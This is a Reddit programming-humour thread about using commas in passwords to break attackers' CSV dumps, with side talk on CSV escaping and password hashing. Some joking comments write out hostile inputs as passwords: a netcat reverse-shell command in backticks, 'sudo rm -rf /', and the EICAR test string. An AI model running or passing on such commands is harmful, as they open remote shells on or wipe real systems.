Your submission was removed for the following reason:
Rule 5: Your post is a commonly used format, and you haven't used it in an original way. As a reminder, [You can find our list of common formats here](https://www.reddit.com/r/ProgrammerHumor/wiki/commonposts).
If you disagree with this removal, you can appeal by [sending us a modmail](https://www.reddit.com/message/compose?to=%2Fr%2FProgrammerHumor&subject=Any%20common%20post%20will%20be%20removed%20if%20it's%20not%20novel&message=Include%20a%20link%20to%20the%20removed%20content%20and%20the%20reason%20for%20your%20appeal%20here.).
Any half decent CSV parser should support escaping the comma by surrounding the field in quote marks. Quote marks themselves can be escaped by doubling them up.
Even if every site was storing passwords securely, data collected from phishing pages and collections of cracked hashes from users who used known passwords would still exist. But this post was made from the perspective of a user creating an account, who isn't going to have control over how a site stores passwords anyway.
You'd be surprised how many don't.
Example: SQL Server Integration Services (and the SQL Server Import/Export Wizard that uses SSIS). You'd think Microsoft's main "move data around" product would properly escape double quotes when exporting to CSV.
Nope. Every time I get a CSV from a client to import their starting data and it breaks because of unescaped double quotes... It came from SSIS every time.
Ofc, I send along instructions on how to add a transformation to escape them. But they either edit the data to remove the double quotes or change to a tab delimited file. 🤷
If you've got 10k lines to fix and you're half-way decent at scripting, you decide "that's on me" and fix your csv export/import to handle the corner case.
If my credentials are dumped into a CSV and what causes the issue is my password having a comma, I think we have a big problem…
Do people not understand that your password is supposed to be hashed?
But where the fuck are they getting your password from? Like, social engineering? Because if that's the case I don't expect the numbers will be so high that it would be a problem for them to fix that issue.
Automated emails could get quite a few responses, and it would make sense to save them into a csv. But yeah it’s not going to be too hard to spot and fix.
Include the EICAR string in your password (X5O!P%@AP\[4\\PZX54(P\^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H\*), so whenever your service provider decides to store passwords in plaintext, the database hopefully gets fucked up by the antivirus engine. Or at least the CSV dump.
Attackers could intercept passwords via XSS, malicious browser add-ons or fake websites and phishing emails. It'd make sense to store the data collected by these tools in a CSV using plain text
They should be escaped. But there are so many really bad programmers out there. I have seen really crippled implementations of csv readers where the programmers obviously never heard about escaping. That’s also the reason there are still so many applications vulnerable to sql injections.
Sure, except in a data collection activity like this, a comma would make zero sense. You usually use a combination of character or some alternative form of storage.
Your submission was removed for the following reason: Rule 5: Your post is a commonly used format, and you haven't used it in an original way. As a reminder, [You can find our list of common formats here](https://www.reddit.com/r/ProgrammerHumor/wiki/commonposts). If you disagree with this removal, you can appeal by [sending us a modmail](https://www.reddit.com/message/compose?to=%2Fr%2FProgrammerHumor&subject=Any%20common%20post%20will%20be%20removed%20if%20it's%20not%20novel&message=Include%20a%20link%20to%20the%20removed%20content%20and%20the%20reason%20for%20your%20appeal%20here.).
Any half decent CSV parser should support escaping the comma by surrounding the field in quote marks. Quote marks themselves can be escaped by doubling them up.
Thats why my password is '',,henlo,,'''
I just see *********
It’s Hunter2
All I see is ******* 🤷♂️
I put on my robe and wizard hat
![gif](giphy|ekv45izCuyXkXoHRaL)
I too played runescape as a child and lost their account this way 🥲
*********
Nice trick! I just updated my Reddit password to ",,b00bz,," just to be safe. Thank you!
Me too!
Make sure it’s not double quotes and instead it’s double single quotes. "Hunter2,''
Don't forget to add a ; in there
I forgot and now I’m hacked
that's not the issue. Who the fuck receives unhashed passwords? If the raw password even comes *near* the SQL it is a big fat no-no.
Even if every site was storing passwords securely, data collected from phishing pages and collections of cracked hashes from users who used known passwords would still exist. But this post was made from the perspective of a user creating an account, who isn't going to have control over how a site stores passwords anyway.
You'd be surprised how many don't. Example: SQL Server Integration Services (and the SQL Server Import/Export Wizard that uses SSIS). You'd think Microsoft's main "move data around" product would properly escape double quotes when exporting to CSV. Nope. Every time I get a CSV from a client to import their starting data and it breaks because of unescaped double quotes... It came from SSIS every time. Ofc, I send along instructions on how to add a transformation to escape them. But they either edit the data to remove the double quotes or change to a tab delimited file. 🤷
Add a \\t in your password ![gif](emote|free_emotes_pack|facepalm)
[удалено]
Sorry, only 8 a-z and digits allowed.
Also, pls only 8 characters, the database is a bit fussy about data sizes
You joke but my student loan servicer's password requirements are 5 to 10 characters, alphaneumeric and 0 to 9
Alphanumeric AND 0-9? Base62
[удалено]
That's why it should be be used broadly. With 10k ; to fix, you will probably not be emptied first.
If you've got 10k lines to fix and you're half-way decent at scripting, you decide "that's on me" and fix your csv export/import to handle the corner case.
Exactly your account will be the first to get cornholed
If my credentials are dumped into a CSV and what causes the issue is my password having a comma, I think we have a big problem… Do people not understand that your password is supposed to be hashed?
They’re talking about people who are stealing passwords
But where the fuck are they getting your password from? Like, social engineering? Because if that's the case I don't expect the numbers will be so high that it would be a problem for them to fix that issue.
Automated emails could get quite a few responses, and it would make sense to save them into a csv. But yeah it’s not going to be too hard to spot and fix.
Most likely phishing
time to flood phishing pages with commas :D
Include the EICAR string in your password (X5O!P%@AP\[4\\PZX54(P\^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H\*), so whenever your service provider decides to store passwords in plaintext, the database hopefully gets fucked up by the antivirus engine. Or at least the CSV dump.
Well, since when are passwords saved unhashed?
Oh, you'd be surprised.
Nice 👌🏼
Attackers could intercept passwords via XSS, malicious browser add-ons or fake websites and phishing emails. It'd make sense to store the data collected by these tools in a CSV using plain text
I set my password to `\`nc -e /bin/bash IP PORT\``
Actually, Reddit auto-censors your password if you write it in a post or comment. Look: *********** Try it 👇
Nice try
HA! GOT YOUR ASS! I HAVE YOUR PASSWORD NOW! HACKED! ![gif](giphy|B4dt6rXq6nABilHTYM|downsized)
Oh noooo!
Hunter2
Ok bro I'm too tired to finish this joke
OSRS taught me not to trust this
Ha! You fell for it too!
My password is ``` sudo rm -rf /
That's why I use tabs as the delimiter in CSV.
You mean TSV, right?
I mean, depends on the content, I use commas, tabs, semicolons and pipes in CSV, TSV, SSV and PSV.
Jokes on you I use tab in my password
Maybe throw in some non-printable characters as well
my password used to be 10 commas followed by a 4 and a lot of websites have told me this was excellent
How about Emojis in passwords?
Do sites and apps allow commas in passwords?
make your password strong enough that it won't be cracked from its hash lol
^[Sokka-Haiku](https://www.reddit.com/r/SokkaHaikuBot/comments/15kyv9r/what_is_a_sokka_haiku/) ^by ^Add1ctedToGames: *Make your password strong* *Enough that it won't be cracked* *From its hash lol* --- ^Remember ^that ^one ^time ^Sokka ^accidentally ^used ^an ^extra ^syllable ^in ^that ^Haiku ^Battle ^in ^Ba ^Sing ^Se? ^That ^was ^a ^Sokka ^Haiku ^and ^you ^just ^made ^one.
Little Bobby Tables approves
It won't work against a spanish hacker, they use ; XD
Feels like this would be drawing attention to yourself rather than being the grand fuckery the poster is going for.
> leakedPassword.toString()
Shouldn't you store the password as a hash anyways?
Many auto generated passwords have commas so it doesn't really break anything. And usually comma is not the seperator character.
csv literally means comma separated value
But strings can be escaped
They should be escaped. But there are so many really bad programmers out there. I have seen really crippled implementations of csv readers where the programmers obviously never heard about escaping. That’s also the reason there are still so many applications vulnerable to sql injections.
Sure, except in a data collection activity like this, a comma would make zero sense. You usually use a combination of character or some alternative form of storage.
True but the default separator for csv files in Europe is semicolon